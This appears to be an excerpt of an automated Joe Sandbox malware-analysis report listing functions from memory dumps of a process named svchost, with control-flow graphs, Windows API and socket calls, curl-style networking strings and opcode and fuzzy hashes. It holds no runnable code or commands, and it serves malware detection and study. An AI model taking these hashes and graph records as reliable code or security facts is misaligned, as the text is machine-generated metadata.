                                                                • String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                                                                • API String ID: 0-2902238462
                                                                • Opcode ID: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                • Instruction ID: 0e063f906104429761d4ad894316edb5073df14ba151284cf1b8e3b3f50dd596
                                                                • Opcode Fuzzy Hash: 2b05b9d7d767020b8d379a144df4db33f2fea9fa66fb0a38a5545a4e1ad473dc
                                                                • Instruction Fuzzy Hash: F2427D3A208B8086EB668FA1D8403EDA7B4F745FC8F8841259EAD57395EF34D752E310
                                                                Function 00000173D019FE30 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 152libraryloadernetworkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 573 173d019fe30-173d019fe4c 574 173d019fe4e-173d019fe60 WSAStartup 573->574 575 173d019fe96-173d019fe9d call 173d0164840 573->575 577 173d019fe62-173d019fe69 574->577 578 173d019fe79-173d019fe95 call 173d01b9e10 574->578 584 173d01a00ab-173d01a00c2 call 173d01b9e10 575->584 585 173d019fea3-173d019fec8 GetModuleHandleW 575->585 580 173d019fe6b-173d019fe71 577->580 581 173d019fe73 WSACleanup 577->581 580->575 580->581 581->578 586 173d019fed6-173d019ff13 GetProcAddress wcspbrk 585->586 587 173d019feca-173d019fed1 585->587 590 173d019ff3d-173d019ff40 586->590 591 173d019ff15-173d019ff1b 586->591 589 173d01a0066-173d01a00a3 call 173d01ac700 QueryPerformanceFrequency 587->589 589->584 596 173d019ff6c-173d019ff83 GetSystemDirectoryW 590->596 597 173d019ff42-173d019ff55 GetProcAddress 590->597 594 173d019ff1d-173d019ff2a 591->594 595 173d019ff2f-173d019ff38 LoadLibraryW 591->595 601 173d01a002e-173d01a0048 594->601 595->601 598 173d01a0026 596->598 599 173d019ff89-173d019ffa0 malloc 596->599 597->596 602 173d019ff57-173d019ff67 LoadLibraryExW 597->602 598->601 603 173d01a001d-173d01a0020 free 599->603 604 173d019ffa2-173d019ffb0 GetSystemDirectoryW 599->604 601->589 605 173d01a004a-173d01a005d GetProcAddress 601->605 602->601 603->598 604->603 607 173d019ffb2-173d019ffbc 604->607 605->589 608 173d01a005f 605->608 609 173d019ffc0-173d019ffc9 607->609 608->589 609->609 610 173d019ffcb 609->610 611 173d019ffd2-173d019ffd9 610->611 611->611 612 173d019ffdb-173d019ffe8 611->612 613 173d019fff0-173d019fffe 612->613 613->613 614 173d01a0000-173d01a0006 613->614 615 173d01a0014 LoadLibraryW 614->615 616 173d01a0008-173d01a0012 614->616 617 173d01a001a 615->617 616->617 617->603
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocwcspbrk
                                                                • String ID: AddDllDirectory$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32
                                                                • API String ID: 2084031714-2297675747
                                                                • Opcode ID: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                • Instruction ID: d89eefaf6277abac34df1c6639383e2825787af885ce3e4ff0f2bcfa08471bbf
                                                                • Opcode Fuzzy Hash: 25d10e906bd9ae6e16c691fc1285ab9041ef61e00e4e74a3fa809b4385e8702e
                                                                • Instruction Fuzzy Hash: 6F61AF39208A8585FA719B95E4553EAE3B1FB49FD0FC84025D9BE037A4FF78C606A710
                                                                Function 00000173D01749E0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 342COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 826 173d01749e0-173d0174a2c 827 173d0174a30-173d0174a37 826->827 827->827 828 173d0174a39-173d0174a45 827->828 829 173d0174a87-173d0174aa3 828->829 830 173d0174a47-173d0174a5d call 173d019e230 828->830 832 173d0174ab5-173d0174aca call 173d01750c0 829->832 833 173d0174aa5-173d0174ab0 call 173d0197730 829->833 838 173d0174a73-173d0174a82 call 173d0164a70 830->838 839 173d0174a5f-173d0174a71 call 173d019e230 830->839 840 173d0174ae9-173d0174af0 832->840 841 173d0174acc-173d0174ae5 call 173d0164b60 832->841 833->832 853 173d0174f0c 838->853 839->829 839->838 845 173d0174af2-173d0174afa call 173d0197770 840->845 846 173d0174aff-173d0174b03 840->846 841->840 845->846 851 173d0174b09-173d0174b13 846->851 852 173d0174f01-173d0174f09 846->852 855 173d0174b49-173d0174b5f inet_pton 851->855 856 173d0174b15-173d0174b43 call 173d0188350 * 2 851->856 852->853 854 173d0174f0f-173d0174f35 call 173d01b9e10 853->854 858 173d0174b67-173d0174b7d inet_pton 855->858 859 173d0174b61-173d0174b65 855->859 856->855 876 173d0174ede-173d0174ee3 856->876 863 173d0174b83 858->863 864 173d0174c0d-173d0174c15 858->864 862 173d0174b87-173d0174b9a call 173d01618a0 859->862 875 173d0174ba0-173d0174ba8 862->875 862->876 863->862 867 173d0174c17-173d0174c25 864->867 868 173d0174c56-173d0174c67 call 173d019e230 864->868 871 173d0174c27-173d0174c3c call 173d01743b0 867->871 872 173d0174c42-173d0174c50 867->872 879 173d0174c6d 868->879 880 173d0174cfb 868->880 871->872 872->868 872->876 882 173d0174baa-173d0174bb8 call 173d0197730 875->882 883 173d0174bbd-173d0174be4 call 173d0173e50 875->883 876->854 885 173d0174c74-173d0174c7b 879->885 886 173d0174d02-173d0174d0b 880->886 882->883 892 173d0174bf7-173d0174bfa 883->892 893 173d0174be6-173d0174bf3 call 173d0197770 883->893 885->885 889 173d0174c7d-173d0174c81 885->889 886->886 890 173d0174d0d-173d0174d44 htons inet_pton 886->890 894 173d0174c83-173d0174c9e call 173d019e2a0 889->894 895 173d0174ca0-173d0174ca3 889->895 896 173d0174d46-173d0174d49 890->896 897 173d0174d4e-173d0174d69 calloc 890->897 899 173d0174ef3-173d0174efc call 173d01752d0 892->899 900 173d0174c00-173d0174c08 call 173d01616c0 892->900 893->892 894->880 894->895 905 173d0174ca5-173d0174cac 895->905 906 173d0174ccb-173d0174cd8 call 173d0175510 895->906 902 173d0174e9a-173d0174e9d 896->902 903 173d0174d73-173d0174dac 897->903 904 173d0174d6b-173d0174d6e 897->904 899->852 900->852 902->875 907 173d0174ea3-173d0174ea6 902->907 911 173d0174db0-173d0174dbf 903->911 904->902 905->906 912 173d0174cae-173d0174cc6 call 173d01663d0 905->912 906->876 924 173d0174cde-173d0174ceb call 173d0173e40 906->924 907->852 915 173d0174ea8-173d0174eb9 907->915 911->911 917 173d0174dc1-173d0174dc8 911->917 912->902 920 173d0174ec2 call 173d01525a0 915->920 921 173d0174ebb-173d0174ec0 call 173d01666b0 915->921 922 173d0174dd0-173d0174dd7 917->922 931 173d0174ec7-173d0174ed0 920->931 921->931 922->922 927 173d0174dd9-173d0174dee calloc 922->927 929 173d0174cf0-173d0174cf6 924->929 932 173d0174e97 927->932 933 173d0174df4-173d0174e77 htons inet_pton 927->933 929->902 934 173d0174eda-173d0174edc 931->934 935 173d0174ed2-173d0174ed5 call 173d01752d0 931->935 932->902 936 173d0174e80-173d0174e8f 933->936 934->876 938 173d0174ee5-173d0174ef1 934->938 935->934 936->936 939 173d0174e91-173d0174e95 936->939 938->852 939->902
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                • API String ID: 1960554822-2421204314
                                                                • Opcode ID: 0edaa2b13891c3644038c0d754203b9f17ad93a6b24d923121f716e7c7c04ea3
                                                                • Instruction ID: 3efe34afd428d68072e5196a52b9a2cab66ad0f00d8bbc20fbb4213fb9113e50
                                                                • Opcode Fuzzy Hash: 0edaa2b13891c3644038c0d754203b9f17ad93a6b24d923121f716e7c7c04ea3
                                                                • Instruction Fuzzy Hash: B3E1BA7A608A9086FB258BA5D5403EDA7B1B784FD8F848215CE2D0B795EF78C646A300
                                                                Function 00000173D019B3F0 Relevance: 24.2, APIs: 16, Instructions: 185networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1035 173d019b3f0-173d019b438 socket 1036 173d019b43f-173d019b4be htonl setsockopt 1035->1036 1037 173d019b43a 1035->1037 1039 173d019b661-173d019b67d closesocket * 3 1036->1039 1040 173d019b4c4-173d019b4da bind 1036->1040 1038 173d019b6aa-173d019b6c1 call 173d01b9e10 1037->1038 1041 173d019b682-173d019b6a2 1039->1041 1040->1039 1043 173d019b4e0-173d019b4f4 getsockname 1040->1043 1041->1038 1043->1039 1045 173d019b4fa-173d019b4fe 1043->1045 1045->1039 1046 173d019b504-173d019b515 listen 1045->1046 1046->1039 1047 173d019b51b-173d019b532 socket 1046->1047 1047->1039 1048 173d019b538-173d019b54e connect 1047->1048 1048->1039 1049 173d019b554-173d019b563 call 173d018c2d0 1048->1049 1049->1039 1052 173d019b569-173d019b59e call 173d0192110 accept 1049->1052 1052->1039 1055 173d019b5a4-173d019b5c9 call 173d01a3b60 call 173d018fe30 1052->1055 1055->1039 1060 173d019b5cf-173d019b5dc send 1055->1060 1061 173d019b5e2-173d019b61f call 173d0192110 recv 1060->1061 1064 173d019b6c2-173d019b6c5 1061->1064 1065 173d019b625-173d019b656 WSAGetLastError call 173d01a3b60 call 173d01a3bf0 1061->1065 1067 173d019b6cf-173d019b6d7 1064->1067 1068 173d019b6c7-173d019b6ca 1064->1068 1065->1039 1077 173d019b658-173d019b65f 1065->1077 1067->1039 1069 173d019b6d9-173d019b6e0 1067->1069 1068->1061 1069->1039 1071 173d019b6e6-173d019b6ea 1069->1071 1073 173d019b6ec-173d019b6fb call 173d018c2d0 1071->1073 1074 173d019b717-173d019b722 closesocket 1071->1074 1073->1039 1079 173d019b701-173d019b711 call 173d018c2d0 1073->1079 1074->1041 1077->1039 1077->1061 1079->1039 1079->1074
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                • String ID:
                                                                • API String ID: 3053784475-0
                                                                • Opcode ID: d062e0d662efabfd737838c303d0ff00aeb29085ae0e7c2932690540158412af
                                                                • Instruction ID: d98de5e3dda8299e8c6fc60c8d8a14f8075955558e0fb1c99debac763a280d5c
                                                                • Opcode Fuzzy Hash: d062e0d662efabfd737838c303d0ff00aeb29085ae0e7c2932690540158412af
                                                                • Instruction Fuzzy Hash: 5F819E79708A4085F7309BB5E4903DDA3B1F745FA8F904311DEBE46AE8EB78964AD300
                                                                Function 00000173CFC23E70 Relevance: 5.3, APIs: 3, Instructions: 815COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173CFC36700: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00000173CFC03B13,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000173CFC3670F
                                                                  • Part of subcall function 00000173CFC0F5D0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000173CFC33E56,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86), ref: 00000173CFC0F61C
                                                                • _W_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FDA8), ref: 00000173CFC24935
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FDA8), ref: 00000173CFC2494A
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FDA8), ref: 00000173CFC24958
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$Gettnames_lock_localesrealloc
                                                                • String ID:
                                                                • API String ID: 3705959680-0
                                                                • Opcode ID: bde4317cab3e174679989bb75934b8180b35db1ba5c292bc93aa4c3750b7d610
                                                                • Instruction ID: 23cefbe54e66f54e232ebefe8284cc637f7fb959b227bfede954a2d12f22b281
                                                                • Opcode Fuzzy Hash: bde4317cab3e174679989bb75934b8180b35db1ba5c292bc93aa4c3750b7d610
                                                                • Instruction Fuzzy Hash: 1C823D73709A0286EB53DB21D8903E923B1E754B84F44C827D9AE677A6DF38D685F340
                                                                Function 00000173CFC336D0 Relevance: 5.0, APIs: 3, Instructions: 509COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173CFC36700: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00000173CFC03B13,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000173CFC3670F
                                                                • _Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86,?,?,?,?,?,?,?,00000173CFC0F707), ref: 00000173CFC33DBF
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86,?,?,?,?,?,?,?,00000173CFC0F707), ref: 00000173CFC33DD4
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86,?,?,?,?,?,?,?,00000173CFC0F707), ref: 00000173CFC33DE3
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$Gettnames_lock_locales
                                                                • String ID:
                                                                • API String ID: 2001668406-0
                                                                • Opcode ID: e95d6d510b83beebbd72d37d6b8ab9e38edb898b73e1c8218507de7eafeb0eef
                                                                • Instruction ID: a4b6d37e0288935f980080ede5a58b0416441fa658575caa5f4fd52f6a9cdc4d
                                                                • Opcode Fuzzy Hash: e95d6d510b83beebbd72d37d6b8ab9e38edb898b73e1c8218507de7eafeb0eef
                                                                • Instruction Fuzzy Hash: C7323E3730DA0285EB539B11E8943D927B1B744BC8F58C82799EE677A5DE38C689F340
                                                                Function 00000173CFC03080 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Locale$Info$DownlevelName__crt
                                                                • String ID:
                                                                • API String ID: 1619744293-0
                                                                • Opcode ID: b47bfe36b4610959a40c36704843bb26be612e2c5ad8ea35484c623aa9777f44
                                                                • Instruction ID: d1c73630798a481f725db49e479e5decbc49bf7d9cd5b4f50d84487b455c7622
                                                                • Opcode Fuzzy Hash: b47bfe36b4610959a40c36704843bb26be612e2c5ad8ea35484c623aa9777f44
                                                                • Instruction Fuzzy Hash: 31E06533708B81C2EB415B55F44029AA670B788BC8F648916DFBD23B55CF28CA02D744
                                                                Function 00000173D01579F0 Relevance: 47.6, APIs: 17, Strings: 10, Instructions: 303networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 272 173d01579f0-173d0157a53 call 173d01a3b60 call 173d0158230 277 173d0157ac6-173d0157acd 272->277 278 173d0157a55-173d0157a75 call 173d015c990 272->278 280 173d0157ae8-173d0157b2d call 173d0164bb0 call 173d01b9e10 277->280 281 173d0157acf-173d0157ae1 call 173d0158110 277->281 285 173d0157a7b-173d0157ac1 _errno * 3 call 173d019ec40 call 173d0164a70 278->285 286 173d0157b2e-173d0157b35 278->286 281->280 285->277 290 173d0157b37-173d0157b63 setsockopt 286->290 291 173d0157b65 286->291 294 173d0157b6c-173d0157b89 call 173d0164b60 290->294 291->294 300 173d0157b90-173d0157b95 294->300 301 173d0157b8b-173d0157b8e 294->301 302 173d0157bfb 300->302 303 173d0157b97-173d0157ba0 300->303 301->300 301->302 304 173d0157bfe-173d0157c21 302->304 303->304 305 173d0157ba2-173d0157bcd setsockopt 303->305 306 173d0157c23-173d0157c42 call 173d01ac700 304->306 307 173d0157c5c-173d0157c5f 304->307 305->304 308 173d0157bcf-173d0157bf9 WSAGetLastError call 173d019ec40 call 173d0164b60 305->308 321 173d0157c44-173d0157c4e 306->321 322 173d0157c50-173d0157c5a 306->322 310 173d0157cb3-173d0157cb6 307->310 311 173d0157c61-173d0157c86 getsockopt 307->311 308->304 316 173d0157df8-173d0157e00 310->316 317 173d0157cbc-173d0157cc3 310->317 314 173d0157c88-173d0157c90 311->314 315 173d0157c92-173d0157cad setsockopt 311->315 314->310 314->315 315->310 319 173d0157e43 316->319 320 173d0157e02-173d0157e2e call 173d0188350 * 2 316->320 317->316 323 173d0157cc9-173d0157cf7 setsockopt 317->323 327 173d0157e46-173d0157e4d 319->327 357 173d0157e35-173d0157e37 320->357 358 173d0157e30-173d0157e33 320->358 321->310 322->311 328 173d0157cf9-173d0157d06 WSAGetLastError 323->328 329 173d0157d0b-173d0157d3d call 173d01ac970 setsockopt 323->329 333 173d0157e54-173d0157e78 call 173d017ec50 call 173d0157410 327->333 334 173d0157e4f-173d0157e52 327->334 330 173d0157dea-173d0157df3 call 173d0164b60 328->330 340 173d0157d5a-173d0157d8c call 173d01ac970 setsockopt 329->340 341 173d0157d3f-173d0157d55 WSAGetLastError call 173d0164b60 329->341 330->316 336 173d0157e8d-173d0157e9c call 173d018c2d0 333->336 354 173d0157e7a-173d0157e7d 333->354 334->333 334->336 352 173d0157eb5-173d0157ec6 336->352 353 173d0157e9e-173d0157eb0 WSAGetLastError 336->353 355 173d0157da9-173d0157ddb call 173d01ac970 setsockopt 340->355 356 173d0157d8e-173d0157da4 WSAGetLastError call 173d0164b60 340->356 341->340 352->277 359 173d0157ecc-173d0157ecf 352->359 353->277 354->277 360 173d0157e83-173d0157e88 354->360 355->316 367 173d0157ddd-173d0157de3 WSAGetLastError 355->367 356->355 357->319 362 173d0157e39-173d0157e3e 357->362 358->327 359->280 364 173d0157ed5-173d0157efa call 173d0157f90 call 173d01a3b60 359->364 360->277 362->277 364->280 367->330
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$setsockopt$_errno$CountCounterPerformanceQueryTickgetsocknamegetsockopthtonsinet_ntop
                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                • API String ID: 1107047317-1591695899
                                                                • Opcode ID: 65f48f47c895eec88dc286f94f2bb468524a817aeeb304b407c6ebe9008bb1c6
                                                                • Instruction ID: 96445d2accaf37f7682ac89272f3a8b06389d2415cd8434da7bdb376c01ac91e
                                                                • Opcode Fuzzy Hash: 65f48f47c895eec88dc286f94f2bb468524a817aeeb304b407c6ebe9008bb1c6
                                                                • Instruction Fuzzy Hash: B5D18B3920C68086E730DBA1E4497EEA3B1F786FC4F805211EA6D4BB91FB79C645E700
                                                                Function 00000173D01B1A60 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 367encryptionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 619 173d01b1a60-173d01b1abb call 173d01b4a40 622 173d01b209d 619->622 623 173d01b1ac1-173d01b1ac6 619->623 623->622 624 173d01b1acc-173d01b1ae1 623->624 625 173d01b1b0b-173d01b1b12 624->625 626 173d01b1ae3-173d01b1b05 malloc 624->626 628 173d01b1b3e-173d01b1b4f 625->628 629 173d01b1b14-173d01b1b38 malloc 625->629 626->625 627 173d01b2091 626->627 627->622 630 173d01b1bb2-173d01b1bb4 628->630 631 173d01b1b51-173d01b1b64 realloc 628->631 629->627 629->628 632 173d01b1c01-173d01b1c98 call 173d01ac9b0 malloc 630->632 633 173d01b1bb6-173d01b1be3 call 173d0158c40 630->633 634 173d01b1b66-173d01b1ba9 call 173d0164a70 call 173d01b9e10 631->634 635 173d01b1baa-173d01b1bae 631->635 632->627 645 173d01b1c9e-173d01b1cf8 memmove 632->645 643 173d01b2081 633->643 644 173d01b1be9-173d01b1beb 633->644 635->630 649 173d01b208a 643->649 647 173d01b1de2-173d01b1df1 call 173d0164a70 644->647 648 173d01b1bf1-173d01b1bf4 644->648 652 173d01b1cff-173d01b1d19 free 645->652 662 173d01b1dfb-173d01b1e1b call 173d0164a70 647->662 648->647 651 173d01b1bfa-173d01b1bfe 648->651 649->627 651->632 653 173d01b207d 652->653 654 173d01b1d1f-173d01b1d26 652->654 653->643 656 173d01b1d2c-173d01b1d33 654->656 657 173d01b1fd2-173d01b1fd7 654->657 660 173d01b1d3e-173d01b1d40 656->660 661 173d01b1d35-173d01b1d38 656->661 658 173d01b1fdd-173d01b1fed call 173d019e4c0 657->658 659 173d01b2066-173d01b206f 657->659 666 173d01b1ff2-173d01b1fff 658->666 659->653 664 173d01b1d47-173d01b1d4b 660->664 661->658 661->660 679 173d01b1e25 662->679 667 173d01b1d4d-173d01b1d51 664->667 668 173d01b1d83-173d01b1d8a 664->668 670 173d01b2001-173d01b2008 666->670 671 173d01b2055-173d01b2061 call 173d0164a70 666->671 667->668 672 173d01b1d53-173d01b1d7a call 173d0158c60 667->672 673 173d01b1d8c 668->673 674 173d01b1d99-173d01b1da2 668->674 676 173d01b203f-173d01b204b call 173d0164a70 670->676 677 173d01b200a-173d01b2011 670->677 671->659 672->662 691 173d01b1d7c-173d01b1d81 672->691 673->674 674->664 680 173d01b1da4-173d01b1da8 674->680 676->671 682 173d01b2013-173d01b201f call 173d0164a70 677->682 683 173d01b2029-173d01b2035 call 173d0164a70 677->683 685 173d01b1e2d-173d01b1e34 679->685 680->679 687 173d01b1daa-173d01b1daf 680->687 682->683 683->676 685->643 693 173d01b1e3a-173d01b1e3d 685->693 687->679 689 173d01b1db1-173d01b1dbb 687->689 689->685 694 173d01b1dbd-173d01b1dda memmove 689->694 691->662 691->668 697 173d01b1e3f 693->697 698 173d01b1e48-173d01b1e52 call 173d01b4a60 693->698 694->632 700 173d01b1de0 694->700 697->698 702 173d01b1e5d 698->702 703 173d01b1e54-173d01b1e5b 698->703 700->693 704 173d01b1e64-173d01b1e67 702->704 703->704 705 173d01b1e6d-173d01b1e9d 704->705 706 173d01b1f94-173d01b1f9c 704->706 712 173d01b1f3e-173d01b1f5f call 173d019e4c0 call 173d0164a70 705->712 713 173d01b1ea3-173d01b1eab 705->713 707 173d01b1f9e-173d01b1fa2 706->707 708 173d01b1fb8-173d01b1fbc 706->708 707->649 710 173d01b1fa8-173d01b1fb3 call 173d01b2470 707->710 708->649 711 173d01b1fc2-173d01b1fcd call 173d01b28a0 708->711 710->708 711->657 729 173d01b1f64 712->729 713->712 716 173d01b1eb1-173d01b1eb4 713->716 720 173d01b1eba-173d01b1ec1 716->720 721 173d01b1f69-173d01b1f6c 716->721 720->721 723 173d01b1ec7-173d01b1eee memset call 173d01b7ff0 720->723 725 173d01b1f6e CertFreeCertificateContext 721->725 726 173d01b1f74-173d01b1f7a 721->726 723->729 733 173d01b1ef0-173d01b1efa 723->733 725->726 726->706 727 173d01b1f7c-173d01b1f8b call 173d0164a70 726->727 727->706 729->721 734 173d01b1f2d-173d01b1f3c call 173d0164a70 733->734 735 173d01b1efc-173d01b1f06 733->735 734->729 735->734 736 173d01b1f08-173d01b1f1a call 173d01b4560 735->736 736->729 741 173d01b1f1c-173d01b1f2b call 173d0164a70 736->741 741->729
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
